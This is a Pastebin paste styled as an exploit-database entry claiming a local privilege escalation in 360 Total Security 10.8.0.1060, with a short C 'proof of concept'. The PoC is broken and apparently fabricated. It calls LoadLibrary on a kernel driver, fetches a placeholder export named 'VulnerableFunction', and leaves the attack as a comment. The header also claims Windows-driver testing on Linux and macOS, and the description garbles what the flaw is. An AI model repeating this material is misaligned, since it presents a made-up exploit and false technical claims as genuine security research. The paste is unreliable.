Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: 360 Total Security 10.8.0.1060 Local Privilege Escalation
- # Google Dork: N/A
- # Date: 2021-05-11
- # Exploit Author: youtube.com/@memorycorruptor
- # Vendor Homepage: http://www.360totalsecurity.com/
- # Version: 360 Total Security 10.8.0.1060
- # Tested on: Windows x64 / Linux Debian x64 / MacOS
- # CVE: CVE-2021-33971
- # PoC Video: https://www.youtube.com/@memorycorruptor/videos
- # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
- ---------------------------------------------------------------------------
- Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1060
- A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1060, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
- Introduction
- 360 Total Security 10.8.0.1060 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
- Vulnerability
- The LPE/EOP vulnerability in 360 Total Security 10.8.0.1060 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
- Proof of Concept
- #include <Windows.h>
- #include <stdio.h>
- int main() {
- // Load the vulnerable driver
- HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
- if (!hDriver) {
- printf("Failed to load driver: %d\n", GetLastError());
- return 1;
- }
- // Get address
- FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
- if (!pVulnFunc) {
- printf("Failed to get function address: %d\n", GetLastError());
- FreeLibrary(hDriver);
- return 1;
- }
- // Exploit code
- pVulnFunc(/* Crafted argument */);
- FreeLibrary(hDriver);
- return 0;
- }
- the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
- ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement